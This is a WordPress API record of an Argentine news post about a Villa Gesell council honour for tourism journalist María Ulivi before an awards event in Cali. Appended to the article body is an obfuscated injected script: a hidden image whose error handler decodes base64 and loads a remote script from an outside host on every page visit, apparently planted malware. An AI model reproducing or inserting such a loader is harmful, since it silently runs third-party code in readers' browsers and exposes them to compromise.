{"id":16280,"date":"2024-08-06T09:16:03","date_gmt":"2024-08-06T12:16:03","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=16280"},"modified":"2025-08-13T15:50:24","modified_gmt":"2025-08-13T18:50:24","slug":"honorable-concejo-deliberante-de-villa-gesell-reconoce-a-periodista-de-la-ompt","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2024\/08\/06\/honorable-concejo-deliberante-de-villa-gesell-reconoce-a-periodista-de-la-ompt\/","title":{"rendered":"Honorable Concejo Deliberante de Villa Gesell reconoce a periodista de la OMPT"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-06c93db7974a56a39de4edf31eb7ae92\" style=\"background-color:#5a4303\"><em>El Honorable Concejo Deliberante de Villa Gesell ha sancionado un reconocimiento expresando su benepl\u00e1cito a la periodista geselina Mar\u00eda Ulivi, quien representar\u00e1 a la ciudad y al pa\u00eds en el evento de la Organizaci\u00f3n Mundial del Periodismo Tur\u00edstico en Cali, Colombia. Este importante evento, que se celebrar\u00e1 del 4 al 14 de septiembre de 2024, presenta los premios &#8220;Pasaporte Abierto 2024&#8221;.<\/em><\/h5>\n\n\n\n<p>En el documento oficial, se resalta que el programa de Ulivi, &#8220;El placer de viajar&#8221;, ha sido nominado como medio destacado de Turismo, compitiendo en una categor\u00eda con otros 10 medios especializados a nivel internacional. Ulivi ya recibi\u00f3 este mismo premio en 2022, bajo la categor\u00eda &#8220;A la trayectoria&#8221;, por su especializaci\u00f3n en Turismo y Accesibilidad Tur\u00edstica.<\/p>\n\n\n\n<p>El Concejo Deliberante subraya la importancia del periodismo especializado en la promoci\u00f3n y difusi\u00f3n de todas las modalidades del turismo actual, destacando la contribuci\u00f3n de Ulivi en la promoci\u00f3n de Villa Gesell y sus localidades a trav\u00e9s de canales tanto nacionales como internacionales.<\/p>\n\n\n\n<p>La minuta de comunicaci\u00f3n concluye con la formal expresi\u00f3n del benepl\u00e1cito del Concejo Deliberante hacia Mar\u00eda Ulivi, subrayando su labor period\u00edstica y su nominaci\u00f3n en los premios a desarrollarse en Cali.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"493\" data-id=\"16281\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_6c3d65ee8a104c18957b54d598381b39_mv2.webp\" alt=\"\" class=\"wp-image-16281\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_6c3d65ee8a104c18957b54d598381b39_mv2.webp 740w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_6c3d65ee8a104c18957b54d598381b39_mv2-300x200.webp 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_6c3d65ee8a104c18957b54d598381b39_mv2-696x464.webp 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_6c3d65ee8a104c18957b54d598381b39_mv2-630x420.webp 630w\" sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"493\" data-id=\"16282\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_7590188f19044d28a6dbb339a014738e_mv2.webp\" alt=\"\" class=\"wp-image-16282\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_7590188f19044d28a6dbb339a014738e_mv2.webp 740w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_7590188f19044d28a6dbb339a014738e_mv2-300x200.webp 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_7590188f19044d28a6dbb339a014738e_mv2-696x464.webp 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/ec55d2_7590188f19044d28a6dbb339a014738e_mv2-630x420.webp 630w\" sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-style-default\"><img loading=\"lazy\" decoding=\"async\" width=\"1599\" height=\"899\" data-id=\"16285\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited.jpg\" alt=\"\" class=\"wp-image-16285\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited.jpg 1599w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-300x169.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-1024x576.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-768x432.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-1536x864.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-696x391.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-1068x600.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2024\/08\/IMG-20240805-WA0075-edited-747x420.jpg 747w\" sizes=\"auto, (max-width: 1599px) 100vw, 1599px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Honorable Concejo Deliberante de Villa Gesell ha sancionado un reconocimiento expresando su benepl\u00e1cito a la periodista geselina Mar\u00eda Ulivi, quien representar\u00e1 a la ciudad y al pa\u00eds en el evento de la Organizaci\u00f3n Mundial del Periodismo Tur\u00edstico en Cali, Colombia. Este importante evento, que se celebrar\u00e1 del 4 al 14 de septiembre de 2024, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":16282,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[111],"tags":[],"class_list":["post-16280","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nacional"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=16280"}],"version-history":[{"count":3,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16280\/revisions"}],"predecessor-version":[{"id":19034,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/16280\/revisions\/19034"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/16282"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=16280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=16280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=16280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}